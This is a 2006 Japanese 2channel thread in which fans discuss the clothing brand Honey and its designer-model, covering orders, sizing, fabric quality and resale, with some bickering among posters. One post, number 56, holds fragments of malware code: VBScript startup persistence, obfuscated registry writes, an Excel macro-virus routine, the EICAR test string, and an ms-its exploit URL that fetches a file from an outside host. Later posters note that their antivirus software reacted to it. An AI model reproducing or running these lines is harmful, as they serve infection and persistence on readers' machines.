2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★Honey☆☆簑島三佳2☆☆Honey★

1 :無名モデル:2006/12/15(金) 21:39:36 ID:D8DRHm0W
Honeyについて語りましょう。

2 :無名モデル:2006/12/15(金) 21:43:20 ID:D8DRHm0W
前スレ

もうすぐ★☆☆箕島三佳☆☆★三十路
ttp://life7.2ch.net/test/read.cgi/model/1120964768/

3 :無名モデル:2006/12/15(金) 23:02:57 ID:ueZ7f3sU
新スレッドありがとうございます。

ミカチャン、ディアマンテの春コート
期待できなそうなので
HONEYにかーなり期待してまーす

4 :無名モデル:2006/12/15(金) 23:18:40 ID:LEZz3294
>>1
乙!!!
みかちんの日記毎日楽しみ

5 :無名モデル:2006/12/15(金) 23:50:12 ID:XaH2BNI1
>>1乙(・∀・)
あたし三佳ちゃん大好き★ディアマンテ時代から担当してもらってて,NAVIO閉店悲しすぎる…

6 :無名モデル:2006/12/16(土) 03:04:12 ID:???
みかちゃん本当にいい人と思う。
リクエストに応えてくれてる。
てゆかかわいい。

7 :無名モデル:2006/12/16(土) 06:18:49 ID:f9qQAoNv
ゆみちゃん痩せたら少しサトエリに似てない?

8 :無名モデル:2006/12/16(土) 06:27:44 ID:FTR4NgFZ
ヘアアレンジの日記。

残った髪をねじってバレッタでとめます。
バレッタはどこでとめるの?
バレッタがみえないんだけどどうやってるかわかる?
わかる人教えてください。お願いします。

9 :無名モデル:2006/12/16(土) 09:08:43 ID:ARjw2f1Z
春にお店出来るの楽しみ。友達と必ず行くからね。

10 :無名モデル:2006/12/16(土) 09:12:14 ID:t3IpitYS
>>9
あたしも楽しみにしています!!☆

11 :無名モデル:2006/12/16(土) 09:29:20 ID:???
店出すの春になったんだ?心斎橋だよね?
楽しみすぎる〜!
ナマ三佳ちゃんは本当に可愛いよ★

12 :無名モデル:2006/12/16(土) 09:48:13 ID:???
通販って心配だから早くお店に行きたい。コート再販したら、通販でも買います。
写真で見ても生地がすごくかわいいから絶対欲しいな

13 :無名モデル:2006/12/16(土) 10:53:37 ID:fy+OK0C3
この人ってなんとなくだけど飯島直子に似てない?

14 :無名モデル:2006/12/16(土) 11:18:06 ID:ARjw2f1Z
実物は似てないけど写真は似てる。

15 :無名モデル:2006/12/16(土) 11:18:14 ID:???
>>1さん乙!
新スレ待ってました

年末あたりに何かやるって言ってるけど何だろう?気になる
新作かな

16 :無名モデル:2006/12/16(土) 12:27:10 ID:f9qQAoNv
同い年だけど本当可愛いと思う。
ディアマンテもハニーも買った事ないけど。
もう少し素材よくしてくれたら考えるのにな…


17 :無名モデル:2006/12/16(土) 12:49:16 ID:???
>>12
コートの再販リクエストみんなで出しませんか?
わたしはみかちゃんにメール出しました!

18 :無名モデル:2006/12/16(土) 15:11:09 ID:???
みかちゃん家って本当にカネモなんだなぁ…
羨ましい('A`)

19 :無名モデル:2006/12/16(土) 19:01:32 ID:???
miumiuのバッグいいな〜かわいい〜!
みかちゃん持ってるものみんな欲しくなっちゃう。

20 :無名モデル:2006/12/16(土) 19:16:54 ID:AZ1bTq2S
みかちゃん、ブログでメイク講座してください★
みかちゃんの使ってるアイシャドーとか知りたいです★★★

21 :無名モデル:2006/12/16(土) 19:25:18 ID:CdMeRaP9
>>7
似てるかも。
ゆみちゃんは上品な顔立ちだからすき
女性ウケより男性ウケしそうなタイプだけど

22 :無名モデル:2006/12/16(土) 19:42:24 ID:F4H9ZZKr
質問すみませんm(__)mアンティックワンピって胸元結構あいてるけど、胸大きめの人がきたら谷間まる見えな感じになりますか?

23 :無名モデル:2006/12/16(土) 20:14:02 ID:???
miumiuなの?モスキーノなの?<バッグ

24 :無名モデル:2006/12/16(土) 20:36:05 ID:???
ねこのがモスキーノで、
大きいバッグがミュウミュウ。

25 :無名モデル:2006/12/16(土) 20:42:49 ID:R2tsu7aA
ミカちゃんがアップスタイル講座の時にしてるネックレス、どこのだろう?
カワユイ!

26 :無名モデル:2006/12/16(土) 23:22:51 ID:???
>>25
あれtinkpinkのじゃないのかな?
昔からずっと使ってるよね

27 :無名モデル:2006/12/17(日) 00:33:47 ID:???
うん、tinkpinkのあやのちゃんとお友達だもんね
あのハートのネックレス、かなり大粒だし可愛いよ
確かクリアとピンクがあったけど、今も売ってるかどうかは不明

28 :無名モデル:2006/12/17(日) 00:41:02 ID:pFx9H9T0
ピンク持ってる

29 :無名モデル:2006/12/17(日) 08:19:03 ID:VOsBADAc
blogみたら本当に楽しそう
キラキラしてる3人みたら商品欲しくなってきた!


30 :無名モデル:2006/12/17(日) 09:17:54 ID:o2d7s2hy
あたしも欲しいなあ!!

31 :無名モデル:2006/12/17(日) 14:38:13 ID:???
ブログで在庫状況載せたから
やっぱり再販はしないんだね

32 :無名モデル:2006/12/18(月) 11:22:55 ID:szefr0vX
再販アンティックして欲しい…

33 :無名モデル:2006/12/18(月) 11:35:45 ID:???
ボンボリ・・・!?!?

34 :無名モデル:2006/12/18(月) 11:37:14 ID:???
年末に靴発売らしいね。

35 :無名モデル:2006/12/18(月) 13:36:26 ID:szefr0vX
tinkpinkの偽者たくさんでてるよね。アンティック
今お金ないから買えない。
再販してくれないかなーー。。。

36 :無名モデル:2006/12/18(月) 13:48:12 ID:uHHTBVSh
今一番お金使う時期だから厳しいよね。私も小悪魔とトレンチ予約してお金ないや(笑)

37 :無名モデル:2006/12/18(月) 14:04:35 ID:???
私も新小悪魔黒予約した。ビックリボンワンピ、実際リボン小さくなって残念だったから、今回は、形変えないでほしいな。
ハニーでコート買おうとしたら完売残念でした。それと、携帯からメールの仕方がわからないです

38 :無名モデル:2006/12/18(月) 15:06:38 ID:???
 アンティックは看板商品として定番化しそうじゃない?

コートの良さが分からん。袖がおかしいというか変。

39 :無名モデル:2006/12/18(月) 15:09:18 ID:???
アンティック再販なしだってぇ。お金なくて買えなくて残念だったね。ずっとアンティックしつこく言ってたお金ないオバだよね。

40 :無名モデル:2006/12/18(月) 15:31:32 ID:DnaQyZYs
セレブな感じ大好き大好き!!!☆

41 :無名モデル:2006/12/18(月) 15:51:03 ID:???
>>39
ディアマンテスレで相手にされなくて可哀想…
一人でよく頑張ってるね

42 :無名モデル:2006/12/18(月) 15:55:41 ID:uHHTBVSh
ディアマンテスレなんかないじゃん!何いってんのぉ?

43 :無名モデル:2006/12/18(月) 15:56:21 ID:???
アンティック再販せずレア化してほしい。

44 :無名モデル:2006/12/18(月) 16:01:07 ID:uHHTBVSh
コート私もかわいいと思った。袖がレトロで今年っぽい

45 :無名モデル:2006/12/18(月) 16:20:14 ID:???
みかちゃんhttp://c-docomo.2ch.net/test/-/model/1125945318/n

46 :無名モデル:2006/12/18(月) 17:05:27 ID:???
>>42
釣りですか?

47 :無名モデル:2006/12/18(月) 17:06:53 ID:???
みかちゃんの可愛さは抜群だが、アンティックの可愛さは理解できない

48 :無名モデル:2006/12/18(月) 17:07:19 ID:???
>>45
ディアマンテスレにもマルチご苦労さん。
でもドコモ用URL貼らないでよw

49 :無名モデル:2006/12/18(月) 17:26:34 ID:uHHTBVSh
まるち?

50 :無名モデル:2006/12/18(月) 17:34:57 ID:DnaQyZYs
ミカさん可愛い!!☆

51 :無名モデル:2006/12/18(月) 21:36:11 ID:???
ID:uHHTBVSh

池沼?

52 :無名モデル:2006/12/18(月) 23:47:41 ID:uHHTBVSh
いけぬま?

53 :無名モデル:2006/12/19(火) 00:57:58 ID:???
旧型のアンティックが欲しいよ
前はけっこうオクにも出てたのに最近はめっきり見なくなった
今なら多少高くても買うんだけどな
ドレスコートもそのうちオクに出ること期待してひたすら待つか…

54 :無名モデル:2006/12/19(火) 02:05:33 ID:???
ドレスコート、形と裏地は可愛いけど裏地生地が安っぽい気がする。
速攻ヤフオク出そうな予感・・・
出品者は強気で価格設定しそうだけど・・・

55 :無名モデル:2006/12/19(火) 02:08:40 ID:???
裏地生地 ×
表生地 ○

56 :<body onload=window()>:2006/12/19(火) 06:38:17 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


57 :無名モデル:2006/12/19(火) 08:26:50 ID:???
素人の服によくおまいら何万もかけれるな。
冷静になれよ

自演?

58 :無名モデル:2006/12/19(火) 10:13:18 ID:???
>>57
ディアマンテに高額積むのと一緒でしょ

とマジレス

59 :無名モデル:2006/12/19(火) 10:16:54 ID:kyr6lu+6
57でぃあまんて店員だから気を付けろ

60 :無名モデル:2006/12/19(火) 10:46:12 ID:92ELMwgG
JDの販売員って嫉み凄いよね

61 :無名モデル:2006/12/19(火) 11:19:25 ID:???
>>60
なにを今更

62 :無名モデル:2006/12/19(火) 14:37:13 ID:???
はあ…やっぱりか…
定価で譲ってくれたりしないかなあ??
アンティックも高騰してたっけ?
わたし最近4万くらいで手に入れたよ。

63 :無名モデル:2006/12/19(火) 14:47:30 ID:???
ウィルス貼られたね。
ノートン先生反応しまくり。

64 :無名モデル:2006/12/19(火) 15:09:43 ID:???
>>63
PCで2ちゃん見る時はNGワードに菌コード
これ常識

65 :64:2006/12/19(火) 15:11:01 ID:???
あ、2ちゃんブラウザ使用してる場合ね >NGワード

66 :無名モデル:2006/12/19(火) 16:12:50 ID:???
>>63
専ブラ使いなされ

67 :無名モデル:2006/12/19(火) 21:26:46 ID:???
新作ホントに年内に出るのかな?

68 :無名モデル:2006/12/20(水) 01:08:09 ID:???
探せないなと思ってたら三佳ちゃんの箕っていう字が前スレと違う。
どっちが正しいのよ。

69 :無名モデル:2006/12/20(水) 01:56:51 ID:UfVy6hCT
明日からとうとう発送って…

とうとう じゃなく
いよいよ だよ、ミカちゃん。

70 :無名モデル:2006/12/20(水) 02:19:38 ID:???
私のお洋服たちがとうとうお嫁にいくのね!という心境なのでは

71 :無名モデル:2006/12/20(水) 03:23:22 ID:???
みかちゃんに限ってそれはない。
自ブラ名『Honey』の綴りすら間違った伝説のデザイナー
ですよwww

72 :無名モデル:2006/12/20(水) 04:16:32 ID:he+taHWc
71心汚い

73 :無名モデル:2006/12/20(水) 08:19:25 ID:???
>>68
今回のが正しいんだよ

74 :無名モデル:2006/12/20(水) 09:20:13 ID:???
>>68
前スレで既出だけど。

75 :無名モデル:2006/12/20(水) 14:20:11 ID:0acLi7j2
アンティック着たらそんなに可愛くないかも。
前回ののよさが引き立ちそう。

76 :無名モデル:2006/12/20(水) 14:32:57 ID:+nCICOqe
明日届くの楽しみだね

77 :無名モデル:2006/12/20(水) 14:38:42 ID:n8AhAvDn
うん!
めちゃ楽しみ!!

78 :無名モデル:2006/12/20(水) 18:51:30 ID:???
>>72
あなたいつもいるよね。しかもID丸出しで。
ここはファンサイトやミクシィとは違うし、
馴れ合いだけがしたいならそっち行った方がいいよ。

79 :無名モデル:2006/12/20(水) 23:36:41 ID:he+taHWc
78何様・・・
初めて書いたのに・・・ワラ

80 :無名モデル:2006/12/20(水) 23:48:58 ID:HoZbxjej
ミカさん惹かれるなぁ♪☆

81 :無名モデル:2006/12/21(木) 01:37:14 ID:tH9gnnJY
髪型、自分でイケテないって気付いたのか巻髪にしてるよね。失敗。
痛んだだけで意味なし。下膨れ顔には似合わないよ。

82 :無名モデル:2006/12/21(木) 05:14:43 ID:03+fG2FK
chestyからアンティックワンピに似たのでてるね。

83 :無名モデル:2006/12/21(木) 09:47:23 ID:slF+zP1j
ワラって…

84 :無名モデル:2006/12/21(木) 10:08:58 ID:DKLtcItW
ワラって…馬鹿だね。

85 :無名モデル:2006/12/21(木) 10:40:10 ID:D04J085U
届いたぁー。
もうーすごいかわいいよー!

やったぁ!!!!!!

86 :無名モデル:2006/12/21(木) 11:03:12 ID:gHUf9x5m
ぃやーんまだだよぉ

87 :無名モデル:2006/12/21(木) 11:08:39 ID:???
>>85いいなあ〜〜。
素材とかラインとか実際どう?

私は今日仕事だから受け取りは夜だな・・・

88 :無名モデル:2006/12/21(木) 11:15:21 ID:???
私も届いたよ〜。アンティックワンピの黒です。
ラインキレイでしたよ。レースも柔らかくて、裾のスカラップレースも腕の方はバッチリわかる。
スカート裾の方は浅いスカラップだからそんなに目立たない気もするけど・・・。
もうちょっと裾も深いスカラップレースにして欲しかったなあ。
でもとっても可愛いから色違いで欲しくなった!白が欲しいけど売り切れだよー

89 :無名モデル:2006/12/21(木) 11:28:06 ID:???
届いた人、うらやましーー!
私は22日発送ってメールがきたよ・・・。
クリスマスまでに間に合わないじゃん。
ミカちゃーん。。

90 :無名モデル:2006/12/21(木) 11:31:25 ID:???
>>88レポありがとう!
期待が増したよ!
ミスありませんように・・・

91 :無名モデル:2006/12/21(木) 11:47:02 ID:D04J085U
うん、ワンピもコートもめちゃカワ♪
コートの丈も長めなのに
柔らかい素材だからかそんなに
重たく見えないし。

92 :無名モデル:2006/12/21(木) 12:14:28 ID:???
アンティック買った方、サイズはどんな感じでした?
旧タイプより胸元はゆとりがあるみたいだけど…

93 :無名モデル:2006/12/21(木) 12:20:21 ID:???
この子って本当に頭良くないのかな?

「不備が生じる場合があると否めません。」
っておかしくない?
頭良くないくせに「否めません」なんて言葉遣おうとするから読みにくい日本語になる。

「否めません」を使いたいなら
「不備が生じることも否めません。」
「不備の発生も否めません。」
になると思うのだが・・・。

94 :無名モデル:2006/12/21(木) 12:37:18 ID:???
>>93
うん。良くないというより悪い。
あの断りの仕方自体がかなり変w

ハニーだからね‥不備より今後の不良品を心配してしまう。
発送遅い人達も、クリスマスに間に合うといいね。

95 :無名モデル:2006/12/21(木) 12:55:01 ID:???
そうだね。
問題が起こる前から「お詫び」なんて書くのはおかしい。
お客様を不安にさせる。
それとも既にミスや不良品があるのかな?

96 :無名モデル:2006/12/21(木) 13:09:55 ID:???
言葉遣いが変なのはもう諦めてる。
元ディアマンテ店員だったわけだし。ワッキーもたまに日本語変だもんね…

97 :無名モデル:2006/12/21(木) 13:37:15 ID:???
>>96
ワッキー確かに日本語おかしい。
本とか読まないんだろうね。

そしてワッキーはただの一般人なのに
何でああも、顔を出すかね?
そこまで綺麗とも思わないんだけど。
そして娘はワッキーにそっくりだね。

別にワッキー嫌いじゃないけど顔出しすぎで引く。

98 :無名モデル:2006/12/21(木) 14:29:52 ID:xQanHNCk
コート買ったらよかったかなぁ〜・・・。
ワンサイズだから着丈や肩幅が合うか不安でスルーしたんだけど・・・。
思い切って買った人が羨ましいよ

99 :無名モデル:2006/12/21(木) 14:36:35 ID:gHUf9x5m
コートにたやつあったよん

100 :無名モデル:2006/12/21(木) 14:42:03 ID:WslevurS
はっきりいってオバマンテ向けの大きめサイズだから若い子は着れないよ

101 :無名モデル:2006/12/21(木) 14:42:36 ID:???
>>97
わっき、好きではないけど顔は綺麗だと思うよ
娘全然似てなくて可哀想と思ったけど…
旦那がブサなのかなって思ってた

まぁ好みもあるだろうけど、ワッキーを綺麗と思わない>>97さんは
どういう人が綺麗と思ったりする?
煽りじゃなくてマジで聞きたいんだよね。

102 :無名モデル:2006/12/21(木) 14:55:18 ID:gHUf9x5m
私もワッキー好き。ピエヌのチーク買い貯め真似しちゃった!
でもケースゎどこの店にもおいてないし、どれにも入らない。

103 :無名モデル:2006/12/21(木) 15:21:30 ID:???
ワッキーかわいいと思う。嫌味ないし。
嫌いな人もいるんだね。

104 :無名モデル:2006/12/21(木) 15:30:52 ID:???
私もアンティック買ったけどめちゃカワイイ
オフも買っとけばよかったと後悔してる
42サイズ買ってお直ししちゃおうか迷うけど
丈詰めしたら裾とかってどうなるんだろう?

105 :無名モデル:2006/12/21(木) 15:36:09 ID:???
ワンピもコートも買いそびれたから
ヤフオク出たら多少高くても買う気だった。
でも気に入ってる人多いから出品されなそうだね。


106 :無名モデル:2006/12/21(木) 15:42:38 ID:???
>>104
前回のアンティックと比べてどうですか?
前のは普通より小さめに作られてたって聞いたので。
通常のディアマンテサイズと変わりませんか?

107 :無名モデル:2006/12/21(木) 15:44:34 ID:???
38サイズ、今日届いて、妊婦服みたいだからモバオクで売りますよ。

108 :無名モデル:2006/12/21(木) 15:46:14 ID:???
>>107
でもブログのみかちゃんやちかちゃんは、
妊婦さんみたいには全然見えないけど…

109 :無名モデル:2006/12/21(木) 15:46:24 ID:???
前回より、レースが薄いのにハリがあるかんじで、フワッとします。とってもかわいい。ディアマンテよりはサイズが大きいですよ。

110 :無名モデル:2006/12/21(木) 15:52:38 ID:???
私も届きました。黒ほんとに可愛いです。胸の開きが前より広い感じです。スノーガールも買ってたら良かった。残念です。
もっとハニーの商品集めたいな。
私は痩せ気味なんで38でも少し大きくて、た〜とる合わせる予定です、
あーかわいい。
白も買ったらよかった。

111 :無名モデル:2006/12/21(木) 15:55:46 ID:???
とりあえず、試着のみで、着てないので、38000円で出品します。
ベージュだからかな。
姉が妊婦なんですが、
この形妊婦服であるよと言われて、着たら微妙でした。レースも安っぽくて残念です。
ラパフェみたい、、、。

112 :無名モデル:2006/12/21(木) 15:55:53 ID:XE48nSvV
36サイズもつくってほしいな。
ガリだしちびっこなので。昔のアンティックのサイズがよかった〜

113 :無名モデル:2006/12/21(木) 16:02:41 ID:???
ノベルティのスカーフどんな感じですか??

114 :無名モデル:2006/12/21(木) 16:04:39 ID:???
>>111です。私が太ってるから妊婦に見えるわけではないですよ。少しぽっちゃりの人は似合うかも。
私はガリチビなんで。白か黒ならタートル合わせれそうですけど、ベージュ微妙ですよ。

115 :無名モデル:2006/12/21(木) 16:05:38 ID:???
ノベのスカーフ、ペラペラながらも柄がとっても素敵でした
あの柄が裏地ならコートも買えば良かったって思うくらい


116 :無名モデル:2006/12/21(木) 16:06:40 ID:???
スカーフかわいいです。
首に巻いたらオバチャンぽいけど、カチューシャみたいにしたらレトロで良かったです。
私は携帯にりぼん結びして、ストラップみたいにして使おうと思います。

117 :無名モデル:2006/12/21(木) 16:08:29 ID:???
携帯ストラップかわ赤のハートのやつなんで、結んだらすごくかわいいです。
なんかマリンのようなレトロな、すごくかわいい柄ですよね。

118 :無名モデル:2006/12/21(木) 16:10:42 ID:???
アンティックの黒は薄手の白タートル合せたら可愛かった
シャインワンピは胸元が裏地なしだったから
ベージュのブラするか、中にタートルを着ないと無理
控えめにラインストーンがキラっと光って普段使いできるけど
肩紐がワンピと同じ薄手の生地だから無理したらすぐ切れそうなのが残念

119 :無名モデル:2006/12/21(木) 16:11:35 ID:gHUf9x5m
コートとアンティック再販希望
携帯から買えるようにしてください。
みかちゃんのメールわからないからここに書きました

120 :無名モデル:2006/12/21(木) 16:15:06 ID:Kj++zs73
コートの季節よね…!!☆

121 :無名モデル:2006/12/21(木) 16:15:16 ID:gHUf9x5m
透けるのは致命的ーやだあ。私はあのツィード生地ぜったいかわいいと思うよ。ほしいー。

122 :無名モデル:2006/12/21(木) 16:16:19 ID:gHUf9x5m
コート再販してもすぐ完売しそおだね。絶対買うもん!

123 :無名モデル:2006/12/21(木) 16:23:26 ID:???
絶対ここ読んでくれてると思うのに
再販はしないってブログに公表したから再販はないと思う
次回の新作からは迷ったら買うしかない

124 :無名モデル:2006/12/21(木) 16:27:38 ID:???
お店が出来てから買う。不良品ありそうだよね。

125 :無名モデル:2006/12/21(木) 16:28:43 ID:???
ドレスコートゆみちゃんが着てるのみたら
ラインも綺麗で欲しくなった
靴はヒール高そうだから買うことはないだろうと思う

126 :無名モデル:2006/12/21(木) 16:34:00 ID:gHUf9x5m
春のトレンチ期待

127 :無名モデル:2006/12/21(木) 16:39:34 ID:???
>>124
でもハニーの商品はそんなに数作らないうえに
再販しないから予約なしでは買えないもの多そう
今回だって結局売れ残ってるのは
シャインワンピとアンティックの大きいサイズのみだし

128 :無名モデル:2006/12/21(木) 16:43:11 ID:???
普通の店ではありえないね。さすが宮前弟子
じゃあお店には期待出来ないかな。

129 :無名モデル:2006/12/21(木) 17:08:51 ID:???
>>ID:gHUf9x5m
もうちょっと落ち着いて書き込んだら?連投だらけだよ
それに携帯絵文字はPCから見ると「・」にしか見えないので

130 :106:2006/12/21(木) 17:15:44 ID:???
皆さんレスありがとうございます。
やっぱり迷わず買うべきだったかなorz
普段40なので42だとかなりゆるくなりそうですよね。
今回は諦めようと思います。新作に期待します

131 :無名モデル:2006/12/21(木) 17:27:17 ID:gHUf9x5m
興奮してすみません
。。゚(゚p´ロ`q)゚。

絵文字使うの失礼ですよね。
ご迷惑おかけしました。

みかちゃんのハニーのシャイニー二型とファーとニット、スカート、ジャケットずっと大切にしてます。

実物みょんちゃんの所にサンプルおいてくれたら、分かりやすいのにな。

実物見れないのはやっぱり怖いですよぉ。

132 :無名モデル:2006/12/21(木) 17:30:30 ID:cQboJNY5
アンティックの黒再販して!!!!みかちゃん!!

133 :無名モデル:2006/12/21(木) 17:30:32 ID:???
ばか丸出し

134 :無名モデル:2006/12/21(木) 17:36:19 ID:???
アンティツク再販ナシって書いてるしワラ

135 :無名モデル:2006/12/21(木) 17:40:11 ID:???
ワラとか書く人も馬鹿丸出しだと思うけど。

136 :無名モデル:2006/12/21(木) 17:40:26 ID:???
再販なしだよ。今さら何?コートもワンピも再販なしだよバーカ。買わないおまえらが悪い。私はオークで売る今なら高く売れそうははははは

137 :無名モデル:2006/12/21(木) 17:41:14 ID:gHUf9x5m
藁とかキモイしぃ。貧乏にーと消えて

138 :無名モデル:2006/12/21(木) 17:43:12 ID:???
気持ちわるい たしかに再販なし、限定なら値段あがるかも。
春物期待、
みかちゃんヒョウ柄出しそう。

139 :無名モデル:2006/12/21(木) 17:45:48 ID:???
>>136
>オーク

モバオク厨確定w

140 :無名モデル:2006/12/21(木) 17:46:21 ID:???
>>137
お前もいい加減消えろ

141 :無名モデル:2006/12/21(木) 17:47:13 ID:???
>>139
所謂「モバクオ」だね。オク板で晒されりゃいいのにw

142 :無名モデル:2006/12/21(木) 17:49:13 ID:???
出品したらわかるし。楽しみだね。いちいち書くから、、、バカ?

143 :無名モデル:2006/12/21(木) 17:51:21 ID:gHUf9x5m
消えるよぉ。これからデェトなんでえ。テヘッ

144 :無名モデル:2006/12/21(木) 17:53:31 ID:gHUf9x5m
ここの住人、似ー戸、汚職、主婦、実際は主婦の叔母万手が多い!

145 :無名モデル:2006/12/21(木) 17:55:42 ID:gHUf9x5m
ばいばい おばさん 28歳は叔母さんだから?若いつもりでいるやつ痛い!しかも子持で貧乏で日航に通ってるんだよねぇ。担当は、かおちゃんでぇ。

146 :無名モデル:2006/12/21(木) 18:10:21 ID:???
本日のNGワード
ID:gHUf9x5m

これでスレがスッキリするよ

147 :無名モデル:2006/12/21(木) 18:26:35 ID:???
ワラ

148 :無名モデル:2006/12/21(木) 20:01:33 ID:???
でも、売るつもりなら早めに出さないと売れなそう
現にHoney Diva時代のものって
1〜2万円くらい値落ちしないと売れてないのが現状だし


149 :無名モデル:2006/12/21(木) 20:04:51 ID:???
ヤフオクにもうアンティックのベージュが出てるよ
サイズ42で38000円だって
欲しかった人には朗報だね
誰か白も出してくれないかな〜

150 :無名モデル:2006/12/21(木) 20:09:11 ID:???
42なんかでかくて着れないっすお!

151 :無名モデル:2006/12/21(木) 20:16:37 ID:DKLtcItW
うん42は大きいな…

152 :無名モデル:2006/12/21(木) 20:51:37 ID:???
でもお直ししても定価より安くあがるんじゃない?

153 :無名モデル:2006/12/21(木) 21:07:29 ID:???
アクセ買った人はいないのかな?

154 :無名モデル:2006/12/21(木) 21:27:28 ID:???
モバに早速ストラップ出てるね

155 :無名モデル:2006/12/21(木) 23:27:35 ID:???
そういえばドレスコート実際に買った人いる?
生地とか着心地とかシルエットとか
率直な感想が知りたい

156 :無名モデル:2006/12/21(木) 23:50:53 ID:???
私今日とどかなかったのですが みなさんはとどいてますか

157 :無名モデル:2006/12/22(金) 01:58:02 ID:2bAsVrYG
デブ向け

158 :無名モデル:2006/12/22(金) 09:57:35 ID:???
ミカちゃんがよくかぶってるあのファーの帽子、
ミカちゃんに全然似合っていないように見えるのはわたしだけなのかな?
特にあの赤メガネと合わせてる写真なんか本当にひどいと思ったんだけど・・・。

159 :無名モデル:2006/12/22(金) 10:11:07 ID:???
あれはたしかに似合わないしメガネもアンバランス

160 :無名モデル:2006/12/22(金) 10:13:25 ID:???
赤メガネは似合ってない?
帽子は基本的に似合わないと思う。



161 :無名モデル:2006/12/22(金) 10:27:48 ID:BqO+ygUz
赤いメガネ、
あんまり似合ってないというか、
眼鏡似合わない。

しかもファーの帽子とのバランスがすごいヤバイね。

162 :無名モデル:2006/12/22(金) 11:27:32 ID:???
>156
私も届いてないよ〜。。
クリスマスまでに間に合いますって言ったくせにーーっ!

163 :無名モデル:2006/12/22(金) 11:31:18 ID:???
地方なら、二日かかるよ。沖縄なら三日

164 :無名モデル:2006/12/22(金) 11:46:39 ID:E3XXXWYi
アンティック生地が可愛くない。

165 :無名モデル:2006/12/22(金) 11:57:46 ID:kQIEyjNw
みかたんは帽子とかより姫な
髪型をもっとみせてほしいよね
あと試着できずに高額ワンピ買う勇気でないよーみんなすごいなー

166 :無名モデル:2006/12/22(金) 12:35:24 ID:E3XXXWYi
あの帽子かぶり方がへんなのかな??
眼鏡赤も変。。

167 :無名モデル:2006/12/22(金) 16:12:39 ID:???
アンティックとあの帽子の素材感がバランス悪すぎるんだと思う。
あれはミックススタイルでなくアンバランスだよ…

タートル着てるときならまだマシだけど、ワンピのみの時
あの超ざっくりニット帽はおかしいとオモ。

168 :無名モデル:2006/12/22(金) 17:51:15 ID:ZCWO5uqr
今度のアクセ可愛いかも…

169 :無名モデル:2006/12/22(金) 18:08:00 ID:???
ミカちゃんはともかく、ゆみちゃんまでニット帽マネしてる。
ゆみちゃんの帽子はあまりに似合ってないし、安っぽすぎるよ・・・

170 :無名モデル:2006/12/22(金) 18:11:27 ID:???
ゆみちゃんはハニー自体似合ってない。

171 :無名モデル:2006/12/22(金) 18:40:55 ID:E3XXXWYi
梨花の事すきって言ってたから
ファー帽子買ったのかな。。

172 :無名モデル:2006/12/23(土) 00:17:13 ID:yZwAShPM
大阪ではみかちゃんみたいなカジュアルなのキレイめなのかわからないのが流行なんですか?

173 :無名モデル:2006/12/23(土) 01:23:59 ID:???
私はみかちゃんのコーデ好きだけど。
シャインワンピも下に重ねて着ると普段着で着れていいね

174 :無名モデル:2006/12/23(土) 01:31:44 ID:focZS8nw
しわになりにくそうな春物コートだね

175 :無名モデル:2006/12/23(土) 16:36:57 ID:???
黒以外のアンティック届いた方、どうでしたか?

176 :無名モデル:2006/12/23(土) 22:23:00 ID:rT7/JpiI
>>175
あまりの安っぽさにビックリしました。
もう2度とハニーで買い物しないと思います。
42000円の価値はないですね・・
ディアマンテよりも作りわるく感じた

177 :無名モデル:2006/12/24(日) 01:47:52 ID:???
>>176
何色を買ったの?

178 :無名モデル:2006/12/24(日) 02:35:56 ID:???
自宅とか彼氏んとこ行った時のスナップ写真使用でHPも手抜き
さらにヌーブラ丸見えの画像をネットで晒す神経が理解不能
シャイン着てるみか貧相で全然かわいくない



179 :無名モデル:2006/12/24(日) 02:40:59 ID:sD/1HKtQ
シャインの段々スカートと
ざっくりニットは変かなー
ドレス系ワンピにニットはないわぁ 寒いからしかたないのかな

180 :無名モデル:2006/12/24(日) 03:34:17 ID:???
 みかちゃん自身、ドレッシーで派手なものが好きだよね。

まぁ…ディアマンテと違って、特殊でない=『ハニーは普段着に
出来ますよ』アピールなんじゃないの?>妙な重ね着

 ホムペ写真は確かに手抜きすぎる。
彼女達の写真集じゃないんだから、もっとシンプルに服を
見せる写真も載せて欲しいわ。

181 :ooo:2006/12/24(日) 12:51:59 ID:???
じゃー買わなきゃいーじゃん
ヒト批判するより鏡見てみたら?
ブスな上さらに歪んだ顔になってるよ。

182 :無名モデル:2006/12/24(日) 12:54:07 ID:???
みかちゃんってマメだと思う
ブログ始めた頃はちかちゃんもゆみちゃんもばんばん載せてたけど
最近はほとんどみかちゃんしか載せなくなったよね

183 :無名モデル:2006/12/24(日) 13:53:05 ID:???
ジェニファー再販だってね
値段下がったら欲しいかも

184 :無名モデル:2006/12/24(日) 14:37:19 ID:d6xzFMvh
洋服のデザインわからん画像ばっかり。寝ころがってるのとか、座ってるのとか、胸元のデザインも髪で隠れて見えないやつばっかり。
自分の顔ばっかり。自意識過剰のバカみたい。

185 :無名モデル:2006/12/24(日) 15:31:51 ID:???
まぁまぁ、その分ブログで詳細公開してるんでしょ、きっと
実寸載せてくれるようになったし、素材も明記してるし
ブログにはコーディネイト例まで載せてくれてるんだから
十分親切だと思うけどな

186 :無名モデル:2006/12/24(日) 17:16:39 ID:???
ディアマンテUDの顔中心よりマシだよ…

187 :無名モデル:2006/12/24(日) 19:56:01 ID:???
